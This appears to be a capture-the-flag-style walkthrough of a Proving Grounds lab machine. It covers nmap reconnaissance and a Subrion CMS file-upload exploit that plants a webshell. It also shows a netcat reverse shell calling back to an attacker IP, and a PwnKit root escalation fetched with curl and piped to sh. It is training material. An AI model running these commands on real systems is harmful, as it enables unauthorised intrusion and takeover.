Exfiltrated
Intro
Initial Foothold
# Nmap 7.94SVN scan initiated Fri Mar 29 10:17:34 2024 as: nmap -sC -sV -vv -oA nmap/initial exfiltrated.pg
Nmap scan report for exfiltrated.pg (192.168.172.163)
Host is up, received echo-reply ttl 61 (0.041s latency).
Scanned at 2024-03-29 10:17:34 CDT for 9s
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDH6PH1/ST7TUJ4Mp/l4c7G+TM07YbX7YIsnHzq1TRpvtiBh8MQuFkL1SWW9+za+h6ZraqoZ0ewwkH+0la436t9Q+2H/Nh4CntJOrRbpLJKg4hChjgCHd5KiLCOKHhXPs/FA3mm0Zkzw1tVJLPR6RTbIkkbQiV2Zk3u8oamV5srWIJeYUY5O2XXmTnKENfrPXeHup1+3wBOkTO4Mu17wBSw6yvXyj+lleKjQ6Hnje7KozW5q4U6ijd3LmvHE34UHq/qUbCUbiwY06N2Mj0NQiZqWW8z48eTzGsuh6u1SfGIDnCCq3sWm37Y5LIUvqAFyIEJZVsC/UyrJDPBE+YIODNbN2QLD9JeBr8P4n1rkMaXbsHGywFtutdSrBZwYuRuB2W0GjIEWD/J7lxKIJ9UxRq0UxWWkZ8s3SNqUq2enfPwQt399nigtUerccskdyUD0oRKqVnhZCjEYfX3qOnlAqejr3Lpm8nA31pp6lrKNAmQEjdSO8Jxk04OR2JBxcfVNfs=
| 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI0EdIHR7NOReMM0G7C8zxbLgwB3ump+nb2D3Pe3tXqp/6jNJ/GbU2e4Ab44njMKHJbm/PzrtYzojMjGDuBlQCg=
| 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDCc0saExmeDXtqm5FS+D5RnDke8aJEvFq3DJIr0KZML
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 09BDDB30D6AE11E854BFF82ED638542B
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://exfiltrated.offsec/
| http-robots.txt: 7 disallowed entries
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/
|_/updates/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 29 10:17:43 2024 -- 1 IP address (1 host up) scanned in 8.90 secondsOpen Ports
22/tcp - OpenSSH 8.2p1 Ubuntu
80/tcp - Apache httpd 2.4.41 Ubuntu
80/tcp is running Subrion CMS v4.2.1
Subrion v4.2.1 exploits
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting | php/webapps/47469.txt
Subrion CMS 4.2.1 - 'avatar[path]' XSS | php/webapps/49346.txt
Subrion CMS 4.2.1 - Arbitrary File Upload | php/webapps/49876.py
Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin) | php/webapps/50737.txt
Subrion CMS 4.2.1 - Cross-Site Scripting | php/webapps/45150.txt
Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS) | php/webapps/51110.txt
---------------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Subrion - Arbitrary File Upload of webshell
┌──(joe㉿kali)-[~/hax/pg/exfiltrated]
└─$ python3 49876.py -u http://exfiltrated.offsec/panel/ -l admin -p admin
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Trying to connect to: http://exfiltrated.offsec/panel/
[+] Success!
[+] Got CSRF token: EKdNpVdsAO86ja8qWK4lLk86aPWmAYMUMstEDunx
[+] Trying to log in...
[+] Login Successful!
[+] Generating random name for Webshell...
[+] Generated webshell name: fjzvjyelbvdklzs
[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://exfiltrated.offsec/panel/uploads/fjzvjyelbvdklzs.phar
$ whoami
www-data Download and run linpeas, copy to www folder to make available for download to kali
$ wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -O /tmp/linpeas.sh
$ ls /tmp/
linpeas.sh
$ sh /tmp/linpeas.sh > /tmp/linpeas-output.txt
$ cp /tmp/linpeas-output.txt /var/www/html/subrion/Get Reverse Shell
$ which nc
/usr/bin/nc
$ wget http://192.168.45.197:8000/ncrev.sh -O /tmp/ncrev.sh
$ sh /tmp/ncrev.shContents of reverse shell script
┌──(joe㉿kali)-[~/hax/pg/exfiltrated]
└─$ cat ncrev.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.197 80 >/tmp/fListener catching shell
┌──(joe㉿kali)-[~/hax/pg/exfiltrated]
└─$ sudo nc -lvnp 80
[sudo] password for joe:
listening on [any] 80 ...
connect to [192.168.45.197] from (UNKNOWN) [192.168.172.163] 47826
sh: 0: can't access tty; job control turned off
$ whoami
www-dataPrivilege Escalation
Linpeas output suggesting using PwnKit (CVE-2021-4034)
Running PwnKit exploit to escalate to root
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@exfiltrated:/var/www/html/subrion/uploads$ sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
<.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
root@exfiltrated:/var/www/html/subrion/uploads# whoami
whoami
root
root@exfiltrated:/var/www/html/subrion/uploads# cat /root/proof.txt
cat /root/proof.txt
0d8a7229bdcfd3cf3bd4d86216f5e931Last updated
